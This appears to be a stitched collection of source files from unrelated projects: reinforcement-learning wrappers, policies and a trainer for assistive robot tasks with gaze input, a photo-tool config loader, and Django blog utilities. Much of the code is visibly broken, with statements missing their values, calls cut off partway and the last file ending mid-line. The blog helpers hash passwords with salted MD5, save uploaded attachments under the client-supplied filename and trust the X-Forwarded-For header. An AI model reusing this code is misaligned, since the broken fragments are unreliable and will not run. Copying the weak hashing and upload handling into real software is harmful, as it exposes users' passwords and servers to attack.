{'raw_obs': obs} return obs, r, done, info def _reset(self, obs, info=None): if not isinstance(obs, dict): obs = {'raw_obs': obs} return obs class goal: """ Chooses what features from info to add to obs """ def __init__(self, master_env, config): self.env_name = master_env.env_name self.master_env = master_env self.goal_feat_func = dict( Kitchen=lambda info: [info['target1_pos'], info['orders'], info['tasks']], Bottle=None, OneSwitch=None, Valve=None, BlockPush=lambda info: [info['ground_truth']] )[self.env_name] self.hindsight_feat = dict( Kitchen={'tool_pos': 3, 'orders': 2, 'tasks': 6}, Bottle={'tool_pos': 3}, OneSwitch={'tool_pos': 3}, Valve={'valve_angle': 2}, BlockPush={'ground_truth': 3} )[self.env_name] master_env.goal_size = self.goal_size = sum(self.hindsight_feat.values()) def _step(self, obs, r, done, info): if self.goal_feat_func is not None: obs['goal'] = np.concatenate([np.ravel(state_component) for state_component in self.goal_feat_func(info)]) hindsight_feat = np.concatenate( [np.ravel(info[state_component]) for state_component in self.hindsight_feat.keys()]) obs['hindsight_goal'] = hindsight_feat return obs, r, done, info def _reset(self, obs, info=None): if self.goal_feat_func is not None: obs['goal'] = np.zeros(self.goal_size) obs['hindsight_goal'] = np.zeros(self.goal_size) return obs class static_gaze: def __init__(self, master_env, config): self.gaze_dim = config['gaze_dim'] del master_env.feature_sizes['goal'] master_env.feature_sizes['gaze_features'] = self.gaze_dim self.env_name = master_env.env_name self.master_env = master_env with h5py.File(os.path.join(str(Path(__file__).resolve().parents[2]), 'gaze_capture', 'gaze_data', config['gaze_path']), 'r') as gaze_data: self.gaze_dataset = {k: v[()] for k, v in gaze_data.items()} self.per_step = True def sample_gaze(self, index): unique_target_index = index data = self.gaze_dataset[str(unique_target_index)] return self.master_env.rng.choice(data) def _step(self, obs, r, done, info): if self.per_step: if self.env_name == 'OneSwitch': self.static_gaze = self.sample_gaze(self.master_env.base_env.target_indices.index(info['unique_index'])) elif self.env_name == 'Bottle': self.static_gaze = self.sample_gaze(info['unique_index']) obs['gaze_features'] = self.static_gaze return obs, r, done, info def _reset(self, obs, info=None): if self.env_name == 'OneSwitch': index = self.master_env.base_env.target_indices.index(self.master_env.base_env.unique_index) elif self.env_name == 'Bottle': index = self.master_env.base_env.unique_index obs['gaze_features'] = self.static_gaze = self.sample_gaze(index) return obs class real_gaze: def __init__(self, master_env, config): self.gaze_dim = config['gaze_dim'] del master_env.feature_sizes['goal'] master_env.feature_sizes['gaze_features'] = self.gaze_dim self.env_name = master_env.env_name self.master_env = master_env = cv2.VideoCapture(0) self.face_processor = FaceProcessor( os.path.join(main_dir, 'gaze_capture', 'model_files', 'shape_predictor_68_face_landmarks.dat')) self.i_tracker = ITrackerModel() if torch.cuda.is_available(): self.device = torch.device("cuda:0") self.i_tracker.cuda() state = torch.load(os.path.join(main_dir, 'gaze_capture', 'checkpoint.pth.tar'))['state_dict'] else: self.device = "cpu" state = torch.load(os.path.join(main_dir, 'gaze_capture', 'checkpoint.pth.tar'), map_location=torch.device(ptu.device))['state_dict'] self.i_tracker.load_state_dict(state, strict=False) self.gaze = np.zeros(self.gaze_dim) self.gaze_lock = threading.Lock() self.gaze_thread = None def record_gaze(self): _, frame = features = self.face_processor.get_gaze_features(frame) if features is None: print("GAZE NOT CAPTURED") gaze = np.zeros(self.gaze_dim) else: i_tracker_input = [torch.from_numpy(feature)[None].float().to(self.device) for feature in features] i_tracker_features = self.i_tracker(*i_tracker_input).detach().cpu().numpy() gaze = i_tracker_features[0] self.gaze_lock.acquire() self.gaze = gaze self.gaze_lock.release() def restart_gaze_thread(self): if self.gaze_thread is None or not self.gaze_thread.is_alive(): self.gaze_thread = threading.Thread(target=self.record_gaze, name='gaze_thread') self.gaze_thread.start() def update_obs(self, obs): self.gaze_lock.acquire() obs['gaze_features'] = self.gaze self.gaze_lock.release() def _step(self, obs, r, done, info): self.restart_gaze_thread() self.update_obs(obs) return obs, r, done, info def _reset(self, obs, info=None): self.restart_gaze_thread() self.update_obs(obs) return obs class sim_target: def __init__(self, master_env, config): self.env_name = master_env.env_name self.master_env = master_env self.feature = config.get('feature') del master_env.feature_sizes['goal'] self.target_size = master_env.feature_sizes['target'] = 2 if self.env_name == 'Valve' else 3 # should change to automate for all features eventually if self.feature == 'direction': self.target_size = master_env.feature_sizes['target'] = 3 elif self.feature == 'target_position': self.target_size = master_env.feature_sizes['target'] = 2 self.goal_noise_std = config['goal_noise_std'] def _step(self, obs, r, done, info): self.add_target(obs, info) return obs, r, done, info def _reset(self, obs, info=None): self.add_target(obs, info) return obs def add_target(self, obs, info): if self.feature is None or self.feature is 'goal': target = obs['goal'] elif info is None: target = np.zeros(self.target_size) else: target = info[self.feature] noise = np.random.normal(scale=self.goal_noise_std, size=target.shape) if self.goal_noise_std else 0 obs['target'] = target + noise from rl.policies.keyboard_policy import KeyboardPolicy class keyboard: def __init__(self, master_env, config): self.env_name = master_env.env_name self.master_env = master_env self.feature = config.get('feature') del master_env.feature_sizes['goal'] self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 6) self.mode = config.get('mode') self.noise_p = config.get('keyboard_p') self.blank_p = config.get('blank_p') self.smoothing = config.get('smoothing') self.lag = config.get('lag') self.policy = KeyboardPolicy(master_env, demo=False) def _step(self, obs, r, done, info): self.add_target(obs, info) return obs, r, done, info def _reset(self, obs, info=None): self.policy.reset() self.action = np.zeros(self.size) self.lag_queue = deque(np.zeros((self.lag, self.size))) if self.lag else deque() self.add_target(obs, info) return obs def add_target(self, obs, info): action, _ = self.policy.get_action(obs) obs['user_input'] = action self.action = self.smoothing * self.action + action action = (1-self.smoothing)*self.action self.lag_queue.append(action) lag_action = self.lag_queue.popleft() action = lag_action obs['target'] = action from rl.policies.encdec_policy import EncDecPolicy import rlkit.torch.pytorch_util as ptu import torch as th class sim_keyboard: def __init__(self, master_env, config): self.env_name = master_env.env_name self.master_env = master_env self.feature = config.get('feature') del master_env.feature_sizes['goal'] self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 6) self.mode = config.get('mode') self.noise_p = config.get('keyboard_p') self.blank_p = config.get('blank_p') file_name = os.path.join('image','util_models', f'{self.env_name}_params_s1_sac.pkl') loaded = th.load(file_name, map_location=ptu.device) policy = loaded['trainer/policy'] prev_vae = loaded['trainer/vae'].to(ptu.device) self.policy = EncDecPolicy( policy=policy, features_keys=['goal'], vaes=[prev_vae], deterministic=True, latent_size=4, incl_state=False, ) def _step(self, obs, r, done, info): self.add_target(obs, info) return obs, r, done, info def _reset(self, obs, info=None): self.policy.reset() self.add_target(obs, info) return obs def add_target(self, obs, info): dist = norm(obs[self.feature] - obs['block_pos']) old_dist = norm(obs[self.feature] - obs['old_block_pos']) if self.mode == 'tool': traj = obs[self.feature] - obs['tool_pos'] axis = np.argmax(np.abs(traj)) index = 2 * axis + (traj[axis] > 0) elif self.mode == 'block': traj = obs[self.feature] - obs['block_pos'] axis = np.argmax(np.abs(traj)) index = 2 * axis + (traj[axis] > 0) elif self.mode == 'sip-puff': index = dist < old_dist elif self.mode == 'xy': traj = obs[self.feature][:2] - obs['block_pos'][:2] axis = np.argmax(np.abs(traj)) index = 2 * axis + (traj[axis] > 0) elif self.mode == 'oracle': oracle_action, _ = self.policy.get_action(obs) axis = np.argmax(np.abs(oracle_action)) index = 2 * axis + (oracle_action[axis] > 0) if np.random.uniform() < self.noise_p: index = np.random.randint(self.size) action = np.zeros(self.size) action[index] = 1 if np.random.uniform() < self.blank_p: action = np.zeros(self.size) if self.mode == 'sip-puff': action[-3:] = obs['old_block_pos'] obs['target'] = action from rl.policies.block_push_oracle import BlockPushOracle class oracle: def __init__(self, master_env, config): self.env_name = master_env.env_name self.master_env = master_env self.feature = config.get('feature') del master_env.feature_sizes['goal'] self.size = master_env.feature_sizes['target'] = config.get('keyboard_size', 7) self.blank_p = config.get('blank_p',0) self.spread = config.get('oracle_noise',0) self.smoothing = config.get('smoothing',0) self.lag = 0 file_name = os.path.join('image','util_models', f'{self.env_name}_params_s1_sac.pkl') loaded = th.load(file_name, map_location=ptu.device) policy = loaded['trainer/policy'] prev_vae = loaded['trainer/vae'].to(ptu.device) self.policy = EncDecPolicy( policy=policy, features_keys=['goal'], vaes=[prev_vae], deterministic=True, latent_size=4, incl_state=False, ) self.use_tool_action = config.get('use_tool_action',False) def _step(self, obs, r, done, info): self.add_target(obs, info) return obs, r, done, info def _reset(self, obs, info=None): self.policy.reset() self.action = np.zeros(self.size) self.lag_queue = deque(np.zeros((self.lag, self.size))) if self.lag else deque() self.add_target(obs, info) return obs def add_target(self, obs, info): action, _ = self.policy.get_action(obs) action += np.random.normal(np.zeros(action.shape), self.spread) if np.random.uniform() < self.blank_p: action = np.zeros(action.shape) self.action = self.smoothing * self.action + action action = (1-self.smoothing)*self.action self.lag_queue.append(action) lag_action = self.lag_queue.popleft() action = lag_action obs['target'] = action class joint: def __init__(self, master_env, config): master_env.observation_space = spaces.Box(-np.inf, np.inf, (master_env.observation_space.low.size + 7,)) def _step(self, obs, r, done, info): obs['raw_obs'] = np.concatenate((obs['raw_obs'], obs['joint'])) return obs, r, done, info def _reset(self, obs, info=None): obs['raw_obs'] = np.concatenate((obs['raw_obs'], obs['joint'])) return obs class dict_to_array: def __init__(self, master_env, config): pass def _step(self, obs, r, done, info): obs = np.concatenate((obs['raw_obs'], obs['target'])) return obs, r, done, info def _reset(self, obs, info=None): obs = np.concatenate((obs['raw_obs'], obs['target'])) return obs class reward: """ rewards capped at 'cap' """ def __init__(self, master_env, config): self.range = (config['reward_min'], config['reward_max']) self.master_env = master_env self.reward_type = config.get('reward_type') self.reward_temp = config.get('reward_temp') self.reward_offset = config.get('reward_offset') def _step(self, obs, r, done, info): if self.reward_type == 'custom': r = -1 r += np.exp(-norm(info['tool_pos'] - info['target1_pos'])) / 2 if info['target1_reached']: r = -.5 r += np.exp(-norm(info['tool_pos'] - info['target_pos'])) / 2 if info['task_success']: r = 0 elif self.reward_type == 'custom_kitchen': r = -1 if not info['tasks'][0] and (info['orders'][0] == 0 or info['tasks'][1]): r += np.exp(-10 * max(0, info['microwave_angle'] - -.7)) / 6 * 3 / 4 * 1 / 2 r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['microwave_handle'])) / 6 / 4 * 1 / 2 elif info['tasks'][0]: r += 1 / 6 if not info['tasks'][1] and (info['orders'][0] == 1 or info['tasks'][0]): r += np.exp(-10 * max(0, .7 - info['fridge_angle'])) / 6 * 3 / 4 * 1 / 2 r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['fridge_handle'])) / 6 / 4 * 1 / 2 elif info['tasks'][1]: r += 1 / 6 if not info['tasks'][2] and info['tasks'][0] and info['tasks'][1]: r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['target1_pos'])) / 6 * 1 / 2 elif info['tasks'][2]: r = -1 / 2 if not info['tasks'][3] and info['tasks'][2]: r += np.exp(-self.reward_temp * norm(info['tool_pos'] - info['target_pos'])) / 6 * 1 / 2 elif info['tasks'][3]: r = -1 / 3 if not info['tasks'][4] and info['tasks'][3] and (info['orders'][1] == 0 or info['tasks'][5]): r += np.exp(-norm(info['microwave_angle'] - 0)) / 6 * 3 / 4 * 1 / 2 dist = norm(info['tool_pos'] - info['microwave_handle']) if dist > .25: r += np.exp(-self.reward_temp * dist) / 6 / 4 * 1 / 2 else: r += np.exp(-self.reward_temp * .25) / 6 / 4 * 1 / 2 elif info['tasks'][4]: r += 1 / 6 if not info['tasks'][5] and info['tasks'][3] and (info['orders'][1] == 1 or info['tasks'][4]): r += np.exp(-norm(info['fridge_angle'] - 0)) / 6 * 3 / 4 * 1 / 2 dist = norm(info['tool_pos'] - info['fridge_handle']) if dist > .25: r += np.exp(-self.reward_temp * dist) / 6 / 4 * 1 / 2 else: r += np.exp(-self.reward_temp * .25) / 6 / 4 * 1 / 2 elif info['tasks'][5]: r += 1 / 6 if info['task_success']: r = 0 elif self.reward_type == 'dist': r = 0 if not info['task_success']: dist = np.linalg.norm(info['tool_pos'] - info['target_pos']) r = np.exp(-self.reward_temp * dist + np.log(1 + self.reward_offset)) - 1 elif self.reward_type == 'custom_switch': r = 0 if not info['task_success']: dist = np.linalg.norm(info['tool_pos'] - info['switch_pos'][info['target_index']]) r = np.exp(-self.reward_temp * dist + np.log(1 + self.reward_offset)) - 1 elif self.reward_type == 'sparse': r = -1 + info['task_success'] elif self.reward_type == 'part_sparse': r = -1 + .5 * (info['task_success'] + info['door_open']) elif self.reward_type == 'terminal_interrupt': r = info['noop'] elif self.reward_type == 'part_sparse_kitchen': r = -1 + sum(info['tasks']) / 6 elif self.reward_type == 'valve_exp': dist = np.abs(self.master_env.base_env.angle_diff(info['valve_angle'], info['target_angle'])) r = np.exp(-self.reward_temp * dist) - 1 elif self.reward_type == 'blockpush_exp': r = -1 dist = norm(info['block_pos']-info['target_pos']) + norm(info['tool_pos'] - info['block_pos'])/2 old_dist = norm(info['old_block_pos']-info['target_pos']) + norm(info['old_tool_pos'] - info['old_block_pos'])/2 under_table_penalty = max(0, info['target_pos'][2]-info['tool_pos'][2]-.1) sigmoid = lambda x: 1/(1 + np.exp(-x)) r += sigmoid(self.reward_temp*(old_dist-dist-under_table_penalty))*self.reward_offset if info['task_success']: r = 0 else: raise Exception r = np.clip(r, *self.range) return obs, r, done, info def _reset(self, obs, info=None): return obs ``` #### File: rl/path_collectors/ ```python from rlkit.samplers.data_collector import MdpPathCollector import pybullet as p from rlkit.samplers.rollout_functions import rollout from rl.misc.env_wrapper import real_gaze import time def _wait_for_key(env, agent, o, key=<KEY>, update_obs_class=real_gaze): while True: keys = p.getKeyboardEvents() if key in keys and keys[key] & p.KEY_WAS_TRIGGERED: break # for some reason needed for obs to be updated time.sleep(0.1) for adapt in env.adapts: if isinstance(adapt, update_obs_class): adapt.update_obs(o) class FullPathCollector(MdpPathCollector): def __init__( self, env, policy, max_num_epoch_paths_saved=None, render=False, render_kwargs=None, rollout_fn=rollout, save_env_in_snapshot=True, real_user=False ): super().__init__(env, policy, max_num_epoch_paths_saved, render, render_kwargs, rollout_fn, save_env_in_snapshot) self.reset_callback = _wait_for_key if real_user else None self.reset_callback = None def collect_new_paths( self, max_path_length, num_steps, discard_incomplete_paths=False, ): paths = [] num_steps_collected = 0 while num_steps_collected < num_steps: path = self._rollout_fn( self._env, self._policy, max_path_length=max_path_length, render=self._render, render_kwargs=self._render_kwargs, reset_callback=self.reset_callback ) path_len = len(path['actions']) num_steps_collected += path_len paths.append(path) self._num_paths_total += len(paths) self._num_steps_total += num_steps_collected self._epoch_paths.extend(paths) return paths def get_snapshot(self): return dict() ``` #### File: rl/policies/ ```python import numpy as np import torch as th from rlkit.torch.core import PyTorchModule import rlkit.torch.pytorch_util as ptu from rlkit.torch.distributions import ( Delta ) from rlkit.torch.networks.stochastic.distribution_generator import DistributionGenerator import random from sklearn.svm import LinearSVR class EncDecPolicy(PyTorchModule): def __init__(self, policy, features_keys, vaes=None, incl_state=True, sample=False, latent_size=None, deterministic=False, random_latent=False, window=None, prev_vae=None, prev_incl_state=False, goal_baseline=False): super().__init__() self.vaes = vaes if vaes is not None else [] self.policy = policy if deterministic: assert isinstance(policy, DistributionGenerator) self.policy = EncDecMakeDeterministic(self.policy) self.features_keys = features_keys self.incl_state = incl_state self.sample = sample self.latent_size = latent_size if self.sample: assert self.latent_size is not None self.random_latent = random_latent self.episode_latent = None self.curr_vae = None self.window = window if window is not None else 1 self.past_means = [] self.past_logvars = [] # use encoder to map to goals for prev vae self.prev_vae = prev_vae self.prev_incl_state = prev_incl_state self.goal_baseline = goal_baseline if self.goal_baseline: self.x_svr_estimator = LinearSVR(max_iter=5000) self.y_svr_estimator = LinearSVR(max_iter=5000) def get_action(self, obs): features = [obs[k] for k in self.features_keys] with th.no_grad(): raw_obs = obs['raw_obs'] encoder_obs = obs.get('encoder_obs', raw_obs) goal_set = obs.get('goal_set') if self.random_latent: pred_features = self.episode_latent.detach().cpu().numpy() elif self.goal_baseline: # baseline specific to valve env x_pred = self.x_svr_estimator.predict(np.concatenate(features)[None])[0] y_pred = self.y_svr_estimator.predict(np.concatenate(features)[None])[0] self.past_means.append([x_pred, y_pred]) self.past_means = self.past_means[-self.window:] avg_pred = np.mean(self.past_means, axis=0) valve_pos = encoder_obs[-3:] valve_xy = np.delete(valve_pos, 1) avg_pred = avg_pred - valve_xy angle_pred = np.arctan2(avg_pred[1], -avg_pred[0]) prev_encoder_inputs = [th.Tensor([np.sin(angle_pred), np.cos(angle_pred)]).to(ptu.device)] if self.prev_incl_state: prev_encoder_inputs.append(th.Tensor(encoder_obs).to(ptu.device)) pred_features, _ = self.prev_vae.encode( pred_features = pred_features.cpu().numpy() elif len(self.vaes): if self.incl_state: features.append(encoder_obs) if goal_set is not None: features.append(goal_set.ravel()) encoder_input = th.Tensor(np.concatenate(features)).to(ptu.device) mean, logvar = self.curr_vae.encode(encoder_input) self.past_means.append(mean) self.past_logvars.append(logvar) self.past_means = self.past_means[-self.window:] self.past_logvars = self.past_logvars[-self.window:] # use current encoder to map to latent if self.prev_vae is None: mean, sigma_squared = self._product_of_gaussians(self.past_means, self.past_logvars) if self.sample: posterior = th.distributions.Normal(mean, th.sqrt(sigma_squared)) pred_features = posterior.rsample() else: pred_features = mean # use current encoder to map to goal for prev vae else: prev_encoder_inputs = [] prev_encoder_inputs.append(th.mean(th.stack(self.past_means), dim=0)) if self.prev_incl_state: prev_encoder_inputs.append(th.Tensor(encoder_obs).to(ptu.device)) pred_features, _ = self.prev_vae.encode( pred_features = pred_features.cpu().numpy() else: pred_features = np.concatenate(features) obs['latents'] = pred_features policy_input = [raw_obs, pred_features] if goal_set is not None: policy_input.insert(1, goal_set.ravel()) action = self.policy.get_action(*policy_input) return action def reset(self): if self.random_latent: self.episode_latent = th.normal(ptu.zeros(self.latent_size), 1).to(ptu.device) self.policy.reset() if len(self.vaes): self.curr_vae = random.choice(self.vaes) self.past_means = [] self.past_logvars = [] def _product_of_gaussians(self, means, logvars): sigmas_squared = th.clamp(th.exp(th.stack(logvars)), min=1e-7) sigma_squared = 1. / th.sum(th.reciprocal(sigmas_squared), dim=0) mean = sigma_squared * th.sum(th.stack(means) / sigmas_squared, dim=0) return mean, sigma_squared class EncDecMakeDeterministic(PyTorchModule): def __init__( self, policy, ): super().__init__() self.policy = policy def forward(self, *args, **kwargs): dist = self.policy.forward(*args, **kwargs) return Delta(dist.mle_estimate()) def get_action(self, *obs_np): return self.policy.get_action(*obs_np) def get_actions(self, *obs_np): return self.policy.get_actions() def reset(self): self.policy.reset() ``` #### File: rl/policies/ ```python import numpy as np from numpy.linalg import norm import pybullet as p class IdentityPolicy: """Assuming simulated keyboard, directly return the target value""" def __init__(self,env): self.base_env = env.base_env self.size = env.action_space.low.size def get_action(self, obs): action = obs['target'] if np.count_nonzero(action): self.action = action else: action = self.action action = self.trajectory(action) obs['latents'] = np.zeros(4) return action, {} def joint(self, action): clip_by_norm = lambda traj, limit: traj / max(1e-4, norm(traj)) * np.clip(norm(traj), None, limit) action = clip_by_norm(action, 1) return action def target(self, coor): base_env = self.base_env joint_states = p.getJointStates(base_env.robot, jointIndices=base_env.robot_left_arm_joint_indices, joint_positions = np.array([x[0] for x in joint_states]) link_pos = p.getLinkState(base_env.robot, 13, computeForwardKinematics=True,[0] new_pos = np.array(coor) + np.array(link_pos) - base_env.tool_pos new_joint_positions = np.array( p.calculateInverseKinematics(base_env.robot, 13, new_pos, new_joint_positions = new_joint_positions[:7] action = new_joint_positions - joint_positions return self.joint(action) def trajectory(self, traj): clip_by_norm = lambda traj, min_l=None, max_l=None: traj / max(1e-4, norm(traj)) * np.clip(norm(traj), min_l, max_l) traj = clip_by_norm(traj, .07, .1) return + traj) def disc_traj(self, action): index = np.argmax(action) traj = [ np.array((-1, 0, 0)), np.array((1, 0, 0)), np.array((0, -1, 0)), np.array((0, 1, 0)), np.array((0, 0, -1)), np.array((0, 0, 1)), ][index] return self.trajectory(traj) def reset(self): self.action = np.zeros(self.size) ``` #### File: rl/policies/ ```python import pybullet as p import numpy as np class KeyboardPolicy: def __init__(self): self.action = np.zeros(6) def get_action(self, obs): keys = p.getKeyboardEvents() inputs = [ p.B3G_RIGHT_ARROW, p.B3G_LEFT_ARROW, ord('r'), ord('f'), p.B3G_DOWN_ARROW, p.B3G_UP_ARROW, ] noop = True for key in inputs: if key in keys and keys[key] & p.KEY_WAS_TRIGGERED: self.action = np.zeros(6) self.action[inputs.index(key)] = 1 noop = False return self.action, {} def reset(self): self.action = np.zeros(6) ``` #### File: rl/trainers/ ```python import torch as th import numpy as np from collections import OrderedDict import rlkit.torch.pytorch_util as ptu from rlkit.torch.torch_rl_algorithm import TorchTrainer class EncDecSACTrainer(TorchTrainer): def __init__(self, vaes, prev_vae, policy, old_policy, qf1, qf2, optimizer, latent_size, feature_keys, beta=1, sample=True, objective='kl', grad_norm_clip=1, incl_state=True, prev_incl_state=False, window_size=None ): super().__init__() self.policy = policy self.old_policy = old_policy self.qf1 = qf1 self.qf2 = qf2 self.optimizer = optimizer self.vaes = vaes self.prev_vae = prev_vae self.beta = beta self.sample = sample self.latent_size = latent_size self.feature_keys = feature_keys self.objective = objective self.grad_norm_clip = grad_norm_clip self.incl_state = incl_state self.prev_incl_state = prev_incl_state self.window_size = window_size self.second_half_latent = False self.eval_statistics = OrderedDict() self._n_train_steps_total = 0 self._need_to_update_eval_statistics = True def get_diagnostics(self): return self.eval_statistics def end_epoch(self, epoch): self._need_to_update_eval_statistics = True def train_from_torch(self, batch): vae = self.vaes[self._num_train_steps % len(self.vaes)] feature_name = lambda x: 'curr_' + x if self.window_size is None else x + '_hist' batch_size = batch['observations'].shape[0] if self.second_half_latent: batch1 = {key: batch[key][:batch_size // 2] for key in batch.keys()} batch2 = {key: batch[key][batch_size // 2:] for key in batch.keys()} batches = [batch1, batch2] objectives = [self.objective, 'latent'] batch_size = batch_size // 2 lambdas = [0.1, 1] else: batches = [batch] objectives = [self.objective] lambdas = [1] supervised_loss = ptu.zeros(1) kl_loss = ptu.zeros(1) latent_error = ptu.zeros(1) for b, objective, l in zip(batches, objectives, lambdas): obs = b['observations'] features =[b[feature_name(key)] for key in self.feature_keys], dim=1) latents = b['curr_latents'] goals = b['curr_goal'] curr_goal_set = b.get('curr_goal_set') has_goal_set = curr_goal_set is not None encoder_features = [features] if self.incl_state: encoder_obs = b.get('curr_encoder_obs', obs) if self.window_size is None \ else b.get('encoder_obs_hist', b['obs_hist']) encoder_features.append(encoder_obs) # goal set and window does not work together if has_goal_set: curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1)) encoder_features.append(curr_goal_set_flat) mean, logvar = vae.encode(, dim=-1)) if self.window_size is not None: if self.objective == 'goal': mask = th.unsqueeze(b['hist_mask'], -1) mean = th.sum(mean * mask, dim=1) / th.sum(mask, dim=1) sigma_squared = None else: mean, sigma_squared = self._product_of_gaussians(mean, logvar, b['hist_mask']) else: sigma_squared = th.exp(logvar) # regress directly to goals if self.objective == 'goal': supervised_loss += th.nn.MSELoss()(mean, goals) elif self.objective == 'awr': pred_mean, pred_logvar = vae.encode(, dim=1)) kl_loss += vae.kl_loss(pred_mean, pred_logvar) supervised_loss += th.nn.GaussianNLLLoss()(pred_mean, latents.detach(), th.exp(pred_logvar)) else: kl_loss += vae.kl_loss(mean, th.log(sigma_squared)) pred_latent = mean if self.sample: pred_latent = pred_latent + th.sqrt(sigma_squared) * ptu.normal(th.zeros(pred_latent.shape), 1) if self.prev_vae is not None: prev_encoder_features = [goals] if self.prev_incl_state: prev_encoder_features.append(b.get('curr_encoder_obs', obs)) if has_goal_set: curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1)) prev_encoder_features.append(curr_goal_set_flat) target_latent = self.prev_vae.sample(, dim=-1), eps=None) else: target_latent = goals latent_error += th.mean(th.linalg.norm(pred_latent - target_latent, dim=-1)) if has_goal_set: curr_goal_set_flat = curr_goal_set.reshape((batch_size, -1)) target_policy_features = [obs, curr_goal_set_flat, target_latent] pred_policy_features = [obs, curr_goal_set_flat, pred_latent] else: target_policy_features = [obs, target_latent] pred_policy_features = [obs, pred_latent] if self.objective == 'kl': target_mean = self.old_policy(*target_policy_features).mean pred_mean = self.policy(*pred_policy_features).mean supervised_loss += l * th.mean(th.sum(th.nn.MSELoss(reduction='none')(pred_mean, target_mean), dim=-1)) elif self.objective == 'normal_kl': target = self.old_policy(*target_policy_features).normal pred = self.policy(*pred_policy_features).normal supervised_loss += l * th.mean(th.distributions.kl.kl_divergence(target, pred)) elif self.objective == 'latent': supervised_loss += l * th.nn.MSELoss()(pred_latent, target_latent.detach()) elif self.objective == 'joint': dist = self.policy(*pred_policy_features) new_obs_actions, log_pi = dist.rsample_and_logprob() if has_goal_set: new_qf_features = [obs, curr_goal_set_flat, goals, new_obs_actions] else: new_qf_features = [obs, goals, new_obs_actions] q_new_actions = th.min( self.qf1(*new_qf_features), self.qf2(*new_qf_features), ) supervised_loss += l * (-q_new_actions).mean() elif self.objective == 'non-parametric': supervised_loss = ptu.zeros(1) else: raise NotImplementedError() kl_loss /= len(batches) latent_error /= len(batches) loss = supervised_loss + self.beta * kl_loss """ Update Q networks """ self.optimizer.zero_grad() loss.backward() if self.grad_norm_clip is not None: th.nn.utils.clip_grad_norm_(vae.encoder.parameters(), self.grad_norm_clip) self.optimizer.step() """ Save some statistics for eval using just one batch. """ if self._need_to_update_eval_statistics: self._need_to_update_eval_statistics = False self.eval_statistics['Loss'] = np.mean(ptu.get_numpy(loss)) self.eval_statistics['SL Loss'] = np.mean(ptu.get_numpy(supervised_loss)) self.eval_statistics['KL Loss'] = np.mean(ptu.get_numpy(kl_loss)) self.eval_statistics['Latent Error'] = np.mean(ptu.get_numpy(latent_error)) def _product_of_gaussians(self, means, logvars, mask): sigmas_squared = th.clamp(th.exp(logvars), min=1e-7) mask = th.unsqueeze(mask, -1) sigma_squared = 1. / th.sum(th.reciprocal(sigmas_squared) * mask, dim=1) mean = sigma_squared * th.sum((means / sigmas_squared) * mask, dim=1) return mean, sigma_squared def compute_kl_div(self, mean, sigma_squared): prior = th.distributions.Normal(ptu.zeros(self.latent_size), ptu.ones(self.latent_size)) posteriors = [th.distributions.Normal(m, th.sqrt(s)) for m, s in zip(th.unbind(mean), th.unbind(sigma_squared))] kl_divs = [th.distributions.kl.kl_divergence(post, prior) for post in posteriors] return th.mean(th.sum(th.stack(kl_divs), dim=-1)) @property def networks(self): nets = self.vaes + [self.policy] return nets def get_snapshot(self): return dict( vaes=tuple(self.vaes), policy=self.policy ) ```
{ "source": "00SteinsGate00/Todays-Photos", "score": 3 }
#### File: Todays-Photos/lib/ ```python import datetime import json class Config: def __init__(self, config_file): # open the file and parse the json cfg_fp = open(config_file, 'r') cfg_json = json.load(cfg_fp) cfg_fp.close() # read the properties self.source_dir = cfg_json['source_dir'] self.destination_dir = cfg_json['destination_dir'] self.export_folder = cfg_json['export_folder'] self.target_folders = cfg_json['target_folders'] self.date_format = cfg_json['date_format'] self.delimiter = cfg_json['export_folder_delimiter'] if 'export_folder_delimiter' in cfg_json.keys() else ' ' ```
{ "source": "00wendi00/blog-project", "score": 3 }
#### File: blog/utils/ ```python import os import uuid import datetime as dt from blog_project import settings # 目录创建 def upload_generation_dir(dir_name): today = # dir_name = dir_name + '/%d%d==' % (today.year, today.month) if not os.path.exists(settings.MEDIA_ROOT + '/' + dir_name): os.makedirs(settings.MEDIA_ROOT + '/' + dir_name) return dir_name # 图片上传 def image_upload(files, dir_name): # 允许上传文件类型 image_suffix = ['jpg', 'png', 'jpeg', 'gif', 'bmp'] file_suffix =".")[-1] relative_path_file = upload_generation_dir(dir_name) path = os.path.join(settings.MEDIA_ROOT, relative_path_file) if not os.path.exists(path): # 如果目录不存在创建目录 os.makedirs(path) # 上传的是图片 if file_suffix in image_suffix: file_name = str(uuid.uuid1()) + "." + file_suffix path_file = os.path.join(path, file_name) file_url = settings.MEDIA_URL + relative_path_file + '/' + file_name open(path_file, 'wb').write( return {"error": 0, "url": file_url} else: # 上传的是附件 file_name = path_file = os.path.join(path, file_name) open(path_file, 'wb').write( return {"error": 0, "url": settings.MEDIA_URL + relative_path_file + '/' +, 'filename':} ``` #### File: blog/utils/ ```python import html import re from hashlib import md5 from django.conf import settings from django.core.cache import cache from blog.models import Tag, Blog, Catagory def getIP(request): """ get request ip :param request: :return: """ if request.META.get('HTTP_X_FORWARDED_FOR'): ip = request.META['HTTP_X_FORWARDED_FOR'] else: ip = request.META['REMOTE_ADDR'] return ip def gainCipher(password, salt=settings.MD5_SALT): """ 密码加盐加密 :param password: :param salt: :return: """ if password: m1 = md5() m1.update(password.encode('utf-8')) p = m1.hexdigest() m2 = md5() m2.update((p + salt).encode('utf-8')) # 加盐 p = m2.hexdigest() return p return None def get_tags_dict(new=False): """ 缓存和获取所有博客的tags :return: {'blog_id':'tag1 tag2'} """ if new: tags_dict = None else: tags_dict = cache.get('tags_dict') if not tags_dict: tags_list = Tag.objects.all().values_list('blog', 'blog__tags__name') tags_dict = {} for item in tags_list: if item[0] in tags_dict: if item[1] not in tags_dict[item[0]]: tags_dict[item[0]].append(item[1]) elif item[0]: tags_dict[item[0]] = [item[1]] tags_dict = {key: ' '.join(tags_dict[key]) for key in tags_dict} cache.set('tags_dict', tags_dict, 3600 * 24 * 30) return tags_dict def get_desc(blog_id=0): """ 缓存和获取所有description, 0存的是所有的title, 其他id存内容 :return: {0:'all title', blog_id:'contet'} """ desc_dict = cache.get('desc_dict') if not desc_dict or not desc_dict.get(blog_id): desc_dict = {} tags = Tag.objects.all().filter(isDelete=False).values('name', 'remark') titles = ' '.join([tag['name'] + ' ' + tag['remark'] for tag in tags]) categorys = Catagory.objects.all().filter(isDelete=False).values('name', 'remark') titles += ' '.join([category['name'] 